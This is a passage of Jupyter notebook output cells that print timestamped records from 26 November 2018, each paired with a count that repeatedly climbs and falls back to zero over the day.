"['2018-11-26 06:47:37', '0']\n",
"['2018-11-26 06:48:54', '0']\n",
"['2018-11-26 06:49:33', '0']\n",
"['2018-11-26 06:50:03', '0']\n",
"['2018-11-26 06:50:38', '0']\n",
"['2018-11-26 06:51:07', '0']\n",
"['2018-11-26 06:51:28', '0']\n",
"['2018-11-26 06:52:00', '0']\n",
"['2018-11-26 06:52:20', '1']\n",
"['2018-11-26 06:54:51', '1']\n",
"['2018-11-26 06:55:19', '1']\n",
"['2018-11-26 06:55:46', '1']\n",
"['2018-11-26 06:56:24', '2']\n",
"['2018-11-26 06:57:07', '2']\n",
"['2018-11-26 06:57:24', '4']\n",
"['2018-11-26 06:58:26', '4']\n",
"['2018-11-26 06:58:47', '4']\n",
"['2018-11-26 06:59:51', '6']\n",
"['2018-11-26 07:04:12', '6']\n",
"['2018-11-26 07:04:36', '7']\n",
"['2018-11-26 07:04:47', '7']\n",
"['2018-11-26 07:05:20', '6']\n",
"['2018-11-26 07:07:08', '6']\n",
"['2018-11-26 07:07:50', '6']\n",
"['2018-11-26 07:09:02', '6']\n",
"['2018-11-26 07:09:14', '6']\n",
"['2018-11-26 07:10:18', '6']\n",
"['2018-11-26 07:10:29', '7']\n",
"['2018-11-26 07:12:50', '3']\n",
"['2018-11-26 07:15:42', '3']\n",
"['2018-11-26 07:15:59', '3']\n",
"['2018-11-26 07:16:13', '4']\n",
"['2018-11-26 07:17:50', '4']\n",
"['2018-11-26 07:18:06', '4']\n",
"['2018-11-26 07:18:39', '4']\n",
"['2018-11-26 07:19:34', '3']\n",
"['2018-11-26 07:20:24', '2']\n",
"['2018-11-26 07:21:25', '2']\n",
"['2018-11-26 07:21:43', '2']\n",
"['2018-11-26 07:22:42', '2']\n",
"['2018-11-26 07:23:16', '2']\n",
"['2018-11-26 07:23:49', '2']\n",
"['2018-11-26 07:24:42', '2']\n",
"['2018-11-26 07:25:18', '2']\n",
"['2018-11-26 07:25:30', '1']\n",
"['2018-11-26 07:29:59', '0']\n",
"['2018-11-26 07:31:25', '0']\n",
"['2018-11-26 07:41:02', '15']\n",
"['2018-11-26 07:41:41', '21']\n",
"['2018-11-26 07:45:20', '25']\n",
"['2018-11-26 07:46:15', '25']\n",
"['2018-11-26 07:47:12', '25']\n",
"['2018-11-26 07:47:34', '25']\n",
"['2018-11-26 07:47:56', '29']\n",
"['2018-11-26 07:48:34', '30']\n",
"['2018-11-26 07:49:07', '31']\n",
"['2018-11-26 07:50:17', '31']\n",
"['2018-11-26 07:50:38', '32']\n",
"['2018-11-26 07:51:27', '35']\n",
"['2018-11-26 07:52:39', '35']\n",
"['2018-11-26 07:52:57', '35']\n",
"['2018-11-26 07:54:28', '35']\n",
"['2018-11-26 07:54:57', '35']\n",
"['2018-11-26 07:55:39', '35']\n",
"['2018-11-26 07:56:56', '37']\n",
"['2018-11-26 07:57:46', '37']\n",
"['2018-11-26 08:00:54', '34']\n",
"['2018-11-26 08:03:25', '37']\n",
"['2018-11-26 08:04:26', '34']\n",
"['2018-11-26 08:06:24', '34']\n",
"['2018-11-26 08:06:43', '26']\n",
"['2018-11-26 08:08:37', '18']\n",
"['2018-11-26 08:10:51', '24']\n",
"['2018-11-26 08:13:04', '26']\n",
"['2018-11-26 08:13:29', '26']\n",
"['2018-11-26 08:13:43', '26']\n",
"['2018-11-26 08:16:15', '26']\n",
"['2018-11-26 08:16:46', '26']\n",
"['2018-11-26 08:16:58', '26']\n",
"['2018-11-26 08:17:35', '8']\n",
"['2018-11-26 08:18:26', '7']\n",
"['2018-11-26 08:19:15', '7']\n",
"['2018-11-26 08:19:49', '7']\n",
"['2018-11-26 08:20:32', '7']\n",
"['2018-11-26 08:21:01', '7']\n",
"['2018-11-26 08:21:14', '7']\n",
"['2018-11-26 08:22:36', '7']\n",
"['2018-11-26 08:23:29', '7']\n",
"['2018-11-26 08:23:57', '7']\n",
"['2018-11-26 08:24:18', '6']\n",
"['2018-11-26 08:25:02', '6']\n",
"['2018-11-26 08:25:35', '4']\n",
"['2018-11-26 08:26:27', '4']\n",
"['2018-11-26 08:26:56', '4']\n",
"['2018-11-26 08:27:22', '4']\n",
"['2018-11-26 08:27:45', '0']\n",
"['2018-11-26 08:31:15', '2']\n",
"['2018-11-26 08:31:51', '2']\n",
"['2018-11-26 08:32:59', '3']\n",
"['2018-11-26 08:33:48', '5']\n",
"['2018-11-26 08:34:36', '6']\n",
"['2018-11-26 08:35:21', '6']\n",
"['2018-11-26 08:35:46', '9']\n",
"['2018-11-26 08:36:49', '17']\n",
"['2018-11-26 08:38:55', '23']\n",
"['2018-11-26 08:41:33', '30']\n",
"['2018-11-26 08:42:17', '31']\n",
"['2018-11-26 08:43:01', '33']\n",
"['2018-11-26 08:44:07', '34']\n",
"['2018-11-26 08:44:45', '34']\n",
"['2018-11-26 08:45:01', '35']\n",
"['2018-11-26 08:45:46', '36']\n",
"['2018-11-26 08:46:32', '36']\n",
"['2018-11-26 08:47:58', '40']\n",
"['2018-11-26 08:48:56', '43']\n",
"['2018-11-26 08:50:02', '53']\n",
"['2018-11-26 08:51:16', '53']\n",
"['2018-11-26 08:51:30', '57']\n",
"['2018-11-26 08:55:01', '52']\n",
"['2018-11-26 08:55:40', '38']\n",
"['2018-11-26 08:57:54', '26']\n",
"['2018-11-26 08:58:57', '25']\n",
"['2018-11-26 09:02:12', '29']\n",
"['2018-11-26 09:04:19', '29']\n",
"['2018-11-26 09:05:38', '21']\n",
"['2018-11-26 09:08:24', '22']\n",
"['2018-11-26 09:09:09', '22']\n",
"['2018-11-26 09:09:56', '26']\n",
"['2018-11-26 09:13:16', '26']\n",
"['2018-11-26 09:14:04', '11']\n",
"['2018-11-26 09:15:07', '11']\n",
"['2018-11-26 09:16:08', '7']\n",
"['2018-11-26 09:17:05', '4']\n",
"['2018-11-26 09:18:11', '4']\n",
"['2018-11-26 09:18:29', '4']\n",
"['2018-11-26 09:19:23', '4']\n",
"['2018-11-26 09:20:00', '4']\n",
"['2018-11-26 09:20:30', '0']\n",
"['2018-11-26 09:21:59', '0']\n",
"['2018-11-26 09:22:33', '0']\n",
"['2018-11-26 09:23:05', '0']\n",
"['2018-11-26 09:24:53', '0']\n",
"['2018-11-26 09:25:27', '0']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:26:01', '0']\n",
"['2018-11-26 09:26:21', '0']\n",
"['2018-11-26 09:32:22', '0']\n",
"['2018-11-26 09:33:04', '0']\n",
"['2018-11-26 09:33:34', '0']\n",
"['2018-11-26 09:34:27', '4']\n",
"['2018-11-26 09:35:21', '4']\n",
"['2018-11-26 09:35:58', '6']\n",
"['2018-11-26 09:37:15', '6']\n",
"['2018-11-26 09:37:54', '8']\n",
"['2018-11-26 09:38:40', '11']\n",
"['2018-11-26 09:39:28', '11']\n",
"['2018-11-26 09:39:35', '12']\n",
"['2018-11-26 09:40:45', '12']\n",
"['2018-11-26 09:41:06', '13']\n",
"['2018-11-26 09:41:56', '13']\n",
"['2018-11-26 09:42:38', '13']\n",
"['2018-11-26 09:43:45', '19']\n",
"['2018-11-26 09:45:13', '19']\n",
"['2018-11-26 09:45:45', '19']\n",
"['2018-11-26 09:45:51', '18']\n",
"['2018-11-26 09:47:23', '20']\n",
"['2018-11-26 09:47:58', '15']\n",
"['2018-11-26 09:55:00', '17']\n",
"['2018-11-26 09:57:52', '18']\n",
"['2018-11-26 09:59:43', '14']\n",
"['2018-11-26 10:01:35', '11']\n",
"['2018-11-26 10:03:29', '2']\n",
"['2018-11-26 10:05:49', '3']\n",
"['2018-11-26 10:07:15', '3']\n",
"['2018-11-26 10:08:42', '3']\n",
"['2018-11-26 10:09:07', '3']\n",
"['2018-11-26 10:09:42', '3']\n",
"['2018-11-26 10:14:11', '2']\n",
"['2018-11-26 10:15:36', '2']\n",
"['2018-11-26 10:16:10', '2']\n",
"['2018-11-26 10:16:44', '2']\n",
"['2018-11-26 10:16:59', '3']\n",
"['2018-11-26 10:17:40', '3']\n",
"['2018-11-26 10:18:15', '3']\n",
"['2018-11-26 10:18:54', '3']\n",
"['2018-11-26 10:19:16', '3']\n",
"['2018-11-26 10:19:26', '3']\n",
"['2018-11-26 10:20:47', '3']\n",
"['2018-11-26 10:22:20', '0']\n",
"['2018-11-26 10:23:10', '0']\n",
"['2018-11-26 10:26:40', '0']\n",
"['2018-11-26 10:30:11', '0']\n",
"['2018-11-26 10:33:42', '0']\n",
"['2018-11-26 10:37:13', '0']\n",
"['2018-11-26 10:40:44', '0']\n",
"['2018-11-26 10:41:04', '1']\n",
"['2018-11-26 10:43:24', '4']\n",
"['2018-11-26 10:45:58', '4']\n",
"['2018-11-26 10:46:51', '5']\n",
"['2018-11-26 10:47:05', '6']\n",
"['2018-11-26 10:48:14', '6']\n",
"['2018-11-26 10:48:28', '6']\n",
"['2018-11-26 10:48:48', '9']\n",
"['2018-11-26 10:49:42', '9']\n",
"['2018-11-26 10:49:51', '13']\n",
"['2018-11-26 10:51:54', '13']\n",
"['2018-11-26 10:53:07', '13']\n",
"['2018-11-26 10:54:01', '13']\n",
"['2018-11-26 10:54:46', '13']\n",
"['2018-11-26 10:54:56', '11']\n",
"['2018-11-26 10:58:37', '10']\n",
"['2018-11-26 11:00:09', '12']\n",
"['2018-11-26 11:02:25', '9']\n",
"['2018-11-26 11:03:19', '9']\n",
"['2018-11-26 11:05:21', '9']\n",
"['2018-11-26 11:06:35', '9']\n",
"['2018-11-26 11:09:19', '12']\n",
"['2018-11-26 11:12:27', '13']\n",
"['2018-11-26 11:12:50', '13']\n",
"['2018-11-26 11:13:19', '13']\n",
"['2018-11-26 11:16:41', '13']\n",
"['2018-11-26 11:16:57', '13']\n",
"['2018-11-26 11:17:30', '13']\n",
"['2018-11-26 11:18:34', '11']\n",
"['2018-11-26 11:19:36', '9']\n",
"['2018-11-26 11:20:28', '8']\n",
"['2018-11-26 11:21:13', '7']\n",
"['2018-11-26 11:22:28', '7']\n",
"['2018-11-26 11:23:37', '6']\n",
"['2018-11-26 11:24:36', '2']\n",
"['2018-11-26 11:25:45', '1']\n",
"['2018-11-26 11:26:55', '0']\n",
"['2018-11-26 11:29:07', '0']\n",
"['2018-11-26 11:29:42', '0']\n",
"['2018-11-26 11:30:19', '0']\n",
"['2018-11-26 11:30:53', '0']\n",
"['2018-11-26 11:31:11', '0']\n",
"['2018-11-26 11:37:50', '0']\n",
"['2018-11-26 11:38:28', '1']\n",
"['2018-11-26 11:39:22', '4']\n",
"['2018-11-26 11:40:32', '4']\n",
"['2018-11-26 11:42:31', '5']\n",
"['2018-11-26 11:43:28', '6']\n",
"['2018-11-26 11:44:30', '9']\n",
"['2018-11-26 11:45:34', '12']\n",
"['2018-11-26 11:46:34', '13']\n",
"['2018-11-26 11:47:15', '14']\n",
"['2018-11-26 11:48:45', '17']\n",
"['2018-11-26 11:50:14', '17']\n",
"['2018-11-26 11:50:47', '19']\n",
"['2018-11-26 11:51:41', '21']\n",
"['2018-11-26 11:52:42', '23']\n",
"['2018-11-26 11:53:43', '25']\n",
"['2018-11-26 11:55:15', '25']\n",
"['2018-11-26 11:56:08', '26']\n",
"['2018-11-26 11:56:41', '27']\n",
"['2018-11-26 11:58:25', '26']\n",
"['2018-11-26 11:59:08', '26']\n",
"['2018-11-26 12:03:17', '24']\n",
"['2018-11-26 12:04:50', '22']\n",
"['2018-11-26 12:06:41', '19']\n",
"['2018-11-26 12:07:50', '19']\n",
"['2018-11-26 12:09:49', '18']\n",
"['2018-11-26 12:13:43', '28']\n",
"['2018-11-26 12:15:25', '29']\n",
"['2018-11-26 12:18:11', '29']\n",
"['2018-11-26 12:19:04', '27']\n",
"['2018-11-26 12:19:14', '30']\n",
"['2018-11-26 12:20:31', '30']\n",
"['2018-11-26 12:22:13', '29']\n",
"['2018-11-26 12:22:49', '28']\n",
"['2018-11-26 12:23:43', '25']\n",
"['2018-11-26 12:24:30', '25']\n",
"['2018-11-26 12:25:19', '24']\n",
"['2018-11-26 12:26:17', '19']\n",
"['2018-11-26 12:27:32', '17']\n",
"['2018-11-26 12:28:31', '12']\n",
"['2018-11-26 12:28:47', '11']\n",
"['2018-11-26 12:30:39', '8']\n",
"['2018-11-26 12:33:32', '4']\n",
"['2018-11-26 12:34:31', '3']\n",
"['2018-11-26 12:35:19', '1']\n",
"['2018-11-26 12:36:07', '1']\n",
"['2018-11-26 12:36:55', '1']\n",
"['2018-11-26 12:37:43', '0']\n",
"['2018-11-26 12:38:31', '6']\n",
"['2018-11-26 12:39:05', '6']\n",
"['2018-11-26 12:41:32', '6']\n",
"['2018-11-26 12:44:13', '5']\n",
"['2018-11-26 12:44:54', '6']\n",
"['2018-11-26 12:45:46', '6']\n",
"['2018-11-26 12:47:16', '6']\n",
"['2018-11-26 12:47:26', '6']\n",
"['2018-11-26 12:48:12', '6']\n",
"['2018-11-26 12:48:36', '6']\n",
"['2018-11-26 12:48:46', '8']\n",
"['2018-11-26 12:50:51', '9']\n",
"['2018-11-26 12:51:55', '11']\n",
"['2018-11-26 12:53:12', '12']\n",
"['2018-11-26 12:54:36', '12']\n",
"['2018-11-26 12:55:27', '12']\n",
"['2018-11-26 13:00:05', '14']\n",
"['2018-11-26 13:01:19', '20']\n",
"['2018-11-26 13:04:27', '26']\n",
"['2018-11-26 13:05:34', '28']\n",
"['2018-11-26 13:06:45', '28']\n",
"['2018-11-26 13:06:58', '28']\n",
"['2018-11-26 13:10:33', '19']\n",
"['2018-11-26 13:14:27', '21']\n",
"['2018-11-26 13:15:16', '21']\n",
"['2018-11-26 13:16:07', '20']\n",
"['2018-11-26 13:18:24', '19']\n",
"['2018-11-26 13:19:01', '21']\n",
"['2018-11-26 13:19:59', '21']\n",
"['2018-11-26 13:21:00', '17']\n",
"['2018-11-26 13:21:56', '16']\n",
"['2018-11-26 13:22:50', '11']\n",
"['2018-11-26 13:23:32', '9']\n",
"['2018-11-26 13:24:39', '8']\n",
"['2018-11-26 13:25:30', '8']\n",
"['2018-11-26 13:25:51', '6']\n",
"['2018-11-26 13:26:59', '4']\n",
"['2018-11-26 13:28:00', '3']\n",
"['2018-11-26 13:29:32', '3']\n",
"['2018-11-26 13:30:00', '3']\n",
"['2018-11-26 13:30:27', '1']\n",
"['2018-11-26 13:31:19', '0']\n",
"['2018-11-26 13:31:57', '0']\n",
"['2018-11-26 13:36:20', '0']\n",
"['2018-11-26 13:37:00', '0']\n",
"['2018-11-26 13:37:24', '0']\n",
"['2018-11-26 13:38:00', '0']\n",
"['2018-11-26 13:39:44', '5']\n",
"['2018-11-26 13:40:59', '5']\n",
"['2018-11-26 13:41:51', '5']\n",
"['2018-11-26 13:42:03', '7']\n",
"['2018-11-26 13:43:04', '7']\n",
"['2018-11-26 13:43:14', '8']\n",
"['2018-11-26 13:44:17', '9']\n",
"['2018-11-26 13:45:29', '9']\n",
"['2018-11-26 13:45:59', '9']\n",
"['2018-11-26 13:46:27', '9']\n",
"['2018-11-26 13:47:11', '10']\n",
"['2018-11-26 13:48:00', '12']\n",
"['2018-11-26 13:49:35', '12']\n",
"['2018-11-26 13:50:06', '18']\n",
"['2018-11-26 13:50:58', '18']\n",
"['2018-11-26 13:52:36', '17']\n",
"['2018-11-26 13:53:17', '18']\n",
"['2018-11-26 13:57:50', '21']\n",
"['2018-11-26 13:59:18', '23']\n",
"['2018-11-26 14:01:44', '25']\n",
"['2018-11-26 14:02:45', '25']\n",
"['2018-11-26 14:04:33', '20']\n",
"['2018-11-26 14:07:25', '21']\n",
"['2018-11-26 14:15:10', '25']\n",
"['2018-11-26 14:18:31', '28']\n",
"['2018-11-26 14:18:57', '25']\n",
"['2018-11-26 14:19:06', '22']\n",
"['2018-11-26 14:20:00', '22']\n",
"['2018-11-26 14:21:03', '21']\n",
"['2018-11-26 14:21:38', '19']\n",
"['2018-11-26 14:22:37', '13']\n",
"['2018-11-26 14:23:26', '12']\n",
"['2018-11-26 14:24:14', '10']\n",
"['2018-11-26 14:25:07', '9']\n",
"['2018-11-26 14:26:03', '7']\n",
"['2018-11-26 14:26:59', '7']\n",
"['2018-11-26 14:27:13', '7']\n",
"['2018-11-26 14:28:35', '7']\n",
"['2018-11-26 14:30:19', '5']\n",
"['2018-11-26 14:31:20', '5']\n",
"['2018-11-26 14:32:33', '2']\n",
"['2018-11-26 14:33:47', '2']\n",
"['2018-11-26 14:35:01', '2']\n",
"['2018-11-26 14:36:15', '0']\n",
"['2018-11-26 14:37:29', '1']\n",
"['2018-11-26 14:37:54', '15']\n",
"['2018-11-26 14:39:55', '18']\n",
"['2018-11-26 14:42:25', '18']\n",
"['2018-11-26 14:42:37', '18']\n",
"['2018-11-26 14:43:30', '18']\n",
"['2018-11-26 14:44:09', '20']\n",
"['2018-11-26 14:44:18', '20']\n",
"['2018-11-26 14:45:07', '23']\n",
"['2018-11-26 14:46:04', '26']\n",
"['2018-11-26 14:46:13', '26']\n",
"['2018-11-26 14:48:16', '27']\n",
"['2018-11-26 14:49:17', '28']\n",
"['2018-11-26 14:50:12', '30']\n",
"['2018-11-26 14:51:26', '30']\n",
"['2018-11-26 14:51:44', '30']\n",
"['2018-11-26 14:54:31', '25']\n",
"['2018-11-26 14:55:17', '24']\n",
"['2018-11-26 14:57:35', '29']\n",
"['2018-11-26 14:58:47', '29']\n",
"['2018-11-26 14:59:47', '32']\n",
"['2018-11-26 15:00:34', '32']\n",
"['2018-11-26 15:04:11', '28']\n",
"['2018-11-26 15:07:19', '28']\n",
"['2018-11-26 15:07:32', '25']\n",
"['2018-11-26 15:08:34', '25']\n",
"['2018-11-26 15:09:36', '25']\n",
"['2018-11-26 15:09:55', '25']\n",
"['2018-11-26 15:10:53', '25']\n",
"['2018-11-26 15:11:49', '23']\n",
"['2018-11-26 15:12:42', '22']\n",
"['2018-11-26 15:13:32', '21']\n",
"['2018-11-26 15:14:14', '20']\n",
"['2018-11-26 15:14:55', '18']\n",
"['2018-11-26 15:16:16', '14']\n",
"['2018-11-26 15:17:08', '10']\n",
"['2018-11-26 15:18:16', '3']\n",
"['2018-11-26 15:19:35', '3']\n",
"['2018-11-26 15:21:08', '3']\n",
"['2018-11-26 15:21:39', '2']\n",
"['2018-11-26 15:22:37', '2']\n",
"['2018-11-26 15:23:09', '2']\n",
"['2018-11-26 15:23:28', '0']\n",
"['2018-11-26 15:31:42', '5']\n",
"['2018-11-26 15:32:19', '5']\n",
"['2018-11-26 15:32:42', '5']\n",
"['2018-11-26 15:33:19', '5']\n",
"['2018-11-26 15:34:23', '5']\n",
"['2018-11-26 15:35:03', '8']\n",
"['2018-11-26 15:35:49', '10']\n",
"['2018-11-26 15:36:02', '11']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 15:36:51', '13']\n",
"['2018-11-26 15:37:29', '13']\n",
"['2018-11-26 15:38:19', '13']\n",
"['2018-11-26 15:39:30', '13']\n",
"['2018-11-26 15:39:54', '13']\n",
"['2018-11-26 15:40:15', '17']\n",
"['2018-11-26 15:41:18', '22']\n",
"['2018-11-26 15:42:23', '24']\n",
"['2018-11-26 15:43:52', '24']\n",
"['2018-11-26 15:44:18', '25']\n",
"['2018-11-26 15:44:58', '26']\n",
"['2018-11-26 15:46:37', '26']\n",
"['2018-11-26 15:46:49', '24']\n",
"['2018-11-26 15:50:33', '23']\n",
"['2018-11-26 15:51:54', '23']\n",
"['2018-11-26 15:52:51', '24']\n",
"['2018-11-26 15:53:53', '20']\n",
"['2018-11-26 15:54:33', '18']\n",
"['2018-11-26 15:56:38', '14']\n",
"['2018-11-26 15:58:27', '14']\n",
"['2018-11-26 16:01:43', '14']\n",
"['2018-11-26 16:02:30', '12']\n",
"['2018-11-26 16:02:37', '12']\n",
"['2018-11-26 16:03:43', '12']\n",
"['2018-11-26 16:05:09', '12']\n",
"['2018-11-26 16:05:23', '12']\n",
"['2018-11-26 16:05:57', '12']\n",
"['2018-11-26 16:06:19', '12']\n",
"['2018-11-26 16:06:41', '11']\n",
"['2018-11-26 16:07:41', '11']\n",
"['2018-11-26 16:08:15', '10']\n",
"['2018-11-26 16:09:10', '9']\n",
"['2018-11-26 16:09:59', '9']\n",
"['2018-11-26 16:11:39', '9']\n",
"['2018-11-26 16:13:59', '4']\n",
"['2018-11-26 16:14:49', '4']\n",
"['2018-11-26 16:15:45', '3']\n",
"['2018-11-26 16:16:42', '0']\n",
"['2018-11-26 16:17:21', '0']\n",
"['2018-11-26 16:17:38', '0']\n",
"['2018-11-26 16:35:24', '1']\n",
"['2018-11-26 16:35:58', '10']\n",
"['2018-11-26 16:38:24', '10']\n",
"['2018-11-26 16:40:37', '10']\n",
"['2018-11-26 16:41:33', '11']\n",
"['2018-11-26 16:41:59', '12']\n",
"['2018-11-26 16:42:33', '12']\n",
"['2018-11-26 16:43:11', '14']\n",
"['2018-11-26 16:44:04', '14']\n",
"['2018-11-26 16:44:33', '14']\n",
"['2018-11-26 16:44:43', '15']\n",
"['2018-11-26 16:46:28', '17']\n",
"['2018-11-26 16:52:10', '18']\n",
"['2018-11-26 16:53:14', '19']\n",
"['2018-11-26 16:54:02', '19']\n",
"['2018-11-26 16:54:55', '19']\n",
"['2018-11-26 16:58:50', '18']\n",
"['2018-11-26 17:00:24', '28']\n",
"['2018-11-26 17:02:25', '31']\n",
"['2018-11-26 17:03:15', '33']\n",
"['2018-11-26 17:06:23', '34']\n",
"['2018-11-26 17:07:09', '33']\n",
"['2018-11-26 17:09:52', '25']\n",
"['2018-11-26 17:12:38', '28']\n",
"['2018-11-26 17:13:29', '31']\n",
"['2018-11-26 17:14:19', '30']\n",
"['2018-11-26 17:17:42', '29']\n",
"['2018-11-26 17:18:34', '33']\n",
"['2018-11-26 17:19:46', '34']\n",
"['2018-11-26 17:20:57', '31']\n",
"['2018-11-26 17:22:06', '29']\n",
"['2018-11-26 17:22:59', '25']\n",
"['2018-11-26 17:23:36', '24']\n",
"['2018-11-26 17:24:56', '24']\n",
"['2018-11-26 17:25:44', '21']\n",
"['2018-11-26 17:26:53', '18']\n",
"['2018-11-26 17:27:57', '14']\n",
"['2018-11-26 17:29:07', '12']\n",
"['2018-11-26 17:29:58', '10']\n",
"['2018-11-26 17:31:34', '10']\n",
"['2018-11-26 17:32:17', '6']\n",
"['2018-11-26 17:33:11', '3']\n",
"['2018-11-26 17:33:57', '0']\n",
"['2018-11-26 17:37:13', '2']\n",
"['2018-11-26 17:37:42', '3']\n",
"['2018-11-26 17:38:29', '4']\n",
"['2018-11-26 17:39:32', '4']\n",
"['2018-11-26 17:40:00', '4']\n",
"['2018-11-26 17:40:36', '2']\n",
"['2018-11-26 17:41:32', '3']\n",
"['2018-11-26 17:42:25', '6']\n",
"['2018-11-26 17:43:22', '6']\n",
"['2018-11-26 17:43:52', '6']\n",
"['2018-11-26 17:43:58', '6']\n",
"['2018-11-26 17:45:01', '7']\n",
"['2018-11-26 17:45:21', '8']\n",
"['2018-11-26 17:46:08', '9']\n",
"['2018-11-26 17:47:16', '13']\n",
"['2018-11-26 17:48:30', '27']\n",
"['2018-11-26 17:50:06', '21']\n",
"['2018-11-26 17:50:40', '19']\n",
"['2018-11-26 17:51:22', '19']\n",
"['2018-11-26 17:52:50', '17']\n",
"['2018-11-26 17:53:38', '15']\n",
"['2018-11-26 18:00:07', '25']\n",
"['2018-11-26 18:01:55', '26']\n",
"['2018-11-26 18:03:47', '26']\n",
"['2018-11-26 18:05:17', '25']\n",
"['2018-11-26 18:05:59', '24']\n",
"['2018-11-26 18:08:22', '22']\n",
"['2018-11-26 18:10:32', '21']\n",
"['2018-11-26 18:13:20', '23']\n",
"['2018-11-26 18:14:06', '24']\n",
"['2018-11-26 18:14:24', '24']\n",
"['2018-11-26 18:17:57', '23']\n",
"['2018-11-26 18:20:00', '21']\n",
"['2018-11-26 18:21:16', '19']\n",
"['2018-11-26 18:22:04', '18']\n",
"['2018-11-26 18:23:04', '18']\n",
"['2018-11-26 18:23:26', '17']\n",
"['2018-11-26 18:24:26', '17']\n",
"['2018-11-26 18:24:57', '17']\n",
"['2018-11-26 18:25:47', '17']\n",
"['2018-11-26 18:26:40', '16']\n",
"['2018-11-26 18:28:30', '18']\n",
"['2018-11-26 18:31:32', '0']\n",
"['2018-11-26 18:32:30', '0']\n",
"['2018-11-26 18:32:58', '0']\n",
"['2018-11-26 18:33:18', '0']\n",
"['2018-11-26 18:34:15', '0']\n",
"['2018-11-26 18:34:33', '0']\n",
"['2018-11-26 18:35:33', '7']\n",
"['2018-11-26 18:36:03', '7']\n",
"['2018-11-26 18:39:23', '18']\n",
"['2018-11-26 18:42:28', '18']\n",
"['2018-11-26 18:42:53', '18']\n",
"['2018-11-26 18:43:19', '18']\n",
"['2018-11-26 18:44:03', '18']\n",
"['2018-11-26 18:44:19', '18']\n",
"['2018-11-26 18:44:43', '18']\n",
"['2018-11-26 18:45:04', '19']\n",
"['2018-11-26 18:45:44', '24']\n",
"['2018-11-26 18:48:29', '25']\n",
"['2018-11-26 18:54:01', '25']\n",
"['2018-11-26 18:54:39', '25']\n",
"['2018-11-26 18:56:13', '25']\n",
"['2018-11-26 18:56:19', '19']\n",
"['2018-11-26 18:59:54', '22']\n",
"['2018-11-26 19:01:02', '24']\n",
"['2018-11-26 19:04:11', '27']\n",
"['2018-11-26 19:05:33', '27']\n",
"['2018-11-26 19:07:21', '28']\n",
"['2018-11-26 19:08:10', '20']\n",
"['2018-11-26 19:10:44', '13']\n",
"['2018-11-26 19:13:25', '13']\n",
"['2018-11-26 19:13:47', '13']\n",
"['2018-11-26 19:15:17', '13']\n",
"['2018-11-26 19:16:27', '12']\n",
"['2018-11-26 19:17:03', '12']\n",
"['2018-11-26 19:17:58', '12']\n",
"['2018-11-26 19:18:53', '12']\n",
"['2018-11-26 19:19:59', '12']\n",
"['2018-11-26 19:20:22', '11']\n",
"['2018-11-26 19:21:08', '11']\n",
"['2018-11-26 19:21:57', '12']\n",
"['2018-11-26 19:23:15', '12']\n",
"['2018-11-26 19:23:38', '10']\n",
"['2018-11-26 19:24:41', '8']\n",
"['2018-11-26 19:25:59', '8']\n",
"['2018-11-26 19:26:21', '5']\n",
"['2018-11-26 19:28:39', '5']\n",
"['2018-11-26 19:29:07', '3']\n",
"['2018-11-26 19:30:00', '2']\n",
"['2018-11-26 19:30:52', '0']\n",
"['2018-11-26 19:36:56', '0']\n",
"['2018-11-26 19:37:48', '0']\n",
"['2018-11-26 19:38:18', '0']\n",
"['2018-11-26 19:38:57', '0']\n",
"['2018-11-26 19:40:58', '0']\n",
"['2018-11-26 19:41:40', '0']\n",
"['2018-11-26 19:42:11', '3']\n",
"['2018-11-26 19:43:20', '3']\n",
"['2018-11-26 19:43:50', '3']\n",
"['2018-11-26 19:44:09', '3']\n",
"['2018-11-26 19:44:22', '3']\n",
"['2018-11-26 19:45:08', '3']\n",
"['2018-11-26 19:45:39', '3']\n",
"['2018-11-26 19:46:03', '3']\n",
"['2018-11-26 19:46:55', '3']\n",
"['2018-11-26 19:47:51', '3']\n",
"['2018-11-26 19:48:47', '3']\n",
"['2018-11-26 19:49:20', '3']\n",
"['2018-11-26 19:49:31', '3']\n",
"['2018-11-26 19:51:43', '3']\n",
"['2018-11-26 19:52:05', '3']\n",
"['2018-11-26 19:56:14', '8']\n",
"['2018-11-26 19:59:34', '8']\n",
"['2018-11-26 20:00:44', '7']\n",
"['2018-11-26 20:02:34', '8']\n",
"['2018-11-26 20:02:53', '12']\n",
"['2018-11-26 20:06:03', '10']\n",
"['2018-11-26 20:07:55', '10']\n",
"['2018-11-26 20:09:56', '11']\n",
"['2018-11-26 20:10:29', '11']\n",
"['2018-11-26 20:10:41', '9']\n",
"['2018-11-26 20:14:30', '10']\n",
"['2018-11-26 20:17:51', '11']\n",
"['2018-11-26 20:18:58', '12']\n",
"['2018-11-26 20:19:28', '11']\n",
"['2018-11-26 20:20:18', '11']\n",
"['2018-11-26 20:20:46', '10']\n",
"['2018-11-26 20:21:12', '11']\n",
"['2018-11-26 20:22:26', '10']\n",
"['2018-11-26 20:23:12', '8']\n",
"['2018-11-26 20:23:51', '7']\n",
"['2018-11-26 20:25:48', '5']\n",
"['2018-11-26 20:28:00', '2']\n",
"['2018-11-26 20:28:47', '0']\n",
"['2018-11-26 20:30:13', '0']\n",
"['2018-11-26 20:31:39', '0']\n",
"['2018-11-26 20:33:05', '0']\n",
"['2018-11-26 20:34:31', '0']\n",
"['2018-11-26 20:35:57', '1']\n",
"['2018-11-26 20:36:29', '6']\n",
"['2018-11-26 20:39:09', '6']\n",
"['2018-11-26 20:41:39', '6']\n",
"['2018-11-26 20:42:04', '6']\n",
"['2018-11-26 20:42:30', '6']\n",
"['2018-11-26 20:43:17', '6']\n",
"['2018-11-26 20:43:34', '6']\n",
"['2018-11-26 20:44:00', '6']\n",
"['2018-11-26 20:44:32', '6']\n",
"['2018-11-26 20:44:55', '6']\n",
"['2018-11-26 20:46:02', '6']\n",
"['2018-11-26 20:47:56', '6']\n",
"['2018-11-26 20:49:00', '7']\n",
"['2018-11-26 20:49:55', '7']\n",
"['2018-11-26 20:51:47', '7']\n",
"['2018-11-26 20:54:50', '8']\n",
"['2018-11-26 20:56:03', '11']\n",
"['2018-11-26 20:59:33', '12']\n",
"['2018-11-26 21:00:39', '12']\n",
"['2018-11-26 21:02:20', '12']\n",
"['2018-11-26 21:03:34', '17']\n",
"['2018-11-26 21:05:12', '24']\n",
"['2018-11-26 21:07:43', '24']\n",
"['2018-11-26 21:07:54', '26']\n",
"['2018-11-26 21:08:39', '25']\n",
"['2018-11-26 21:10:50', '25']\n",
"['2018-11-26 21:11:07', '25']\n",
"['2018-11-26 21:11:40', '21']\n",
"['2018-11-26 21:12:47', '21']\n",
"['2018-11-26 21:13:45', '20']\n",
